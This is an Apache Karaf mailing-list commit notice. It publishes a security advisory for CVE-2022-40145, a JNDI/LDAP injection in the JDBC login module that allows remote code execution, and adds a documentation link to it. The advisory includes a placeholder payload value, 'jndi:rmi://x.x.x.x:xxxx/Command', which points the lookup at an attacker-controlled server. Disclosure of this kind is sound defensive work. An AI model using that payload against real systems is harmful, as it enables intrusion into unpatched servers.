You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@karaf.apache.org by jb...@apache.org on 2022/12/21 13:43:29 UTC
svn commit: r1906138 - in /karaf/site/production: documentation.html feed.xml security/cve-2022-40145.txt
Author: jbonofre
Date: Wed Dec 21 13:43:29 2022
New Revision: 1906138
URL: http://svn.apache.org/viewvc?rev=1906138&view=rev
Log:
[scm-publish] Updating main website contents
Added:
karaf/site/production/security/cve-2022-40145.txt
Modified:
karaf/site/production/documentation.html
karaf/site/production/feed.xml
Modified: karaf/site/production/documentation.html
URL: http://svn.apache.org/viewvc/karaf/site/production/documentation.html?rev=1906138&r1=1906137&r2=1906138&view=diff
==============================================================================
--- karaf/site/production/documentation.html (original)
+++ karaf/site/production/documentation.html Wed Dec 21 13:43:29 2022
@@ -481,6 +481,10 @@
<p>CVE-2022-22932: Path traversal flaws</p>
<a class="btn btn-outline-primary" href="/security/cve-2022-22932.txt">Notes »</a>
</div>
+ <div class="pb-4 mb-3">
+ <p>CVE-2022-40145: JDBC JAAS LDAP injection</p>
+ <a class="btn btn-outline-primary" href="/security/cve-2022-40145.txt">Notes »</a>
+ </div>
</div><!-- /.blog-main -->
</div>
Modified: karaf/site/production/feed.xml
URL: http://svn.apache.org/viewvc/karaf/site/production/feed.xml?rev=1906138&r1=1906137&r2=1906138&view=diff
==============================================================================
--- karaf/site/production/feed.xml (original)
+++ karaf/site/production/feed.xml Wed Dec 21 13:43:29 2022
@@ -1 +1 @@
-<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.0.1">Jekyll</generator><link href="https://karaf.apache.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://karaf.apache.org/" rel="alternate" type="text/html" /><updated>2022-10-23T17:32:05+02:00</updated><id>https://karaf.apache.org/feed.xml</id><title type="html">Apache Karaf - The modulith runtime</title><subtitle>Karaf provides modulith runtime for the enterprise, running on premise or on cloud. Focus on your business code and applications, Apache Karaf deals with the rest.</subtitle></feed>
\ No newline at end of file
+<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.0.1">Jekyll</generator><link href="https://karaf.apache.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://karaf.apache.org/" rel="alternate" type="text/html" /><updated>2022-12-21T13:58:50+01:00</updated><id>https://karaf.apache.org/feed.xml</id><title type="html">Apache Karaf - The modulith runtime</title><subtitle>Karaf provides modulith runtime for the enterprise, running on premise or on cloud. Focus on your business code and applications, Apache Karaf deals with the rest.</subtitle></feed>
\ No newline at end of file
Added: karaf/site/production/security/cve-2022-40145.txt
URL: http://svn.apache.org/viewvc/karaf/site/production/security/cve-2022-40145.txt?rev=1906138&view=auto
==============================================================================
--- karaf/site/production/security/cve-2022-40145.txt (added)
+++ karaf/site/production/security/cve-2022-40145.txt Wed Dec 21 13:43:29 2022
@@ -0,0 +1,48 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Hash: SHA512
+
+CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8
+
+Severity: Low
+
+Vendor: The Apache Software Foundation
+
+Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2
+
+Description:
+
+This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
+
+The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering.
+An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
+This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server.
+
+This has been fixed in revision:
+
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
+https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
+
+Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
+or later as soon as possible, or use correct path.
+
+JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568
+
+Credit: This issue was discovered and reported by Xun Bai <bb...@gmail.com>
+-----BEGIN PGP SIGNATURE-----
+
+iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
+LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
+/2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
+GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
+yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
+a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
+7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
+7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
+NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
+suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
+k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
+ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
+=ozdD
+-----END PGP SIGNATURE-----